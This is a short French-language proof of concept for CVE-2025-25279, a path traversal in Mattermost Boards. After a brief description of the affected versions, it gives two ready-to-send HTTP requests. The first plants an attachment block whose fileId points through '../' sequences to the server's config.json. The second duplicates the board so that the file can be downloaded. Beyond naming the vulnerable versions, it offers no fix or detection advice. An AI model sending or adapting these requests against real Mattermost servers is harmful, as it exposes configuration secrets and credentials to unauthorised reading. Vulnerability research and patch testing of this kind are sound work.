
Preuve de concept pour CVE-2025-25279 : le traversement de chemin dans Mattermost Boards permet la lecture arbitraire de fichiers via une archive d'importation conçue et la duplication de tableaux.
Après avoir téléversé un fichier dans Mattermost Boards, lorsque le paramètre fileId est modifié et que le tableau est copié, le fichier pointe désormais vers le fichier cible spécifié dans le paramètre et le télécharge.
Versions concernées : instances Mattermost avec Boards activé CVE : CVE-2025-25279
Les versions de Mattermost 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2 et 10.2.x <= 10.2.2 ne valident pas correctement les blocs de tableau lors de l'importation de tableaux, ce qui permet à un attaquant de lire n'importe quel fichier du système en important et en exportant une archive d'importation spécialement conçue dans Boards.

POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
Le crédit ne me revient pas, comprend une revue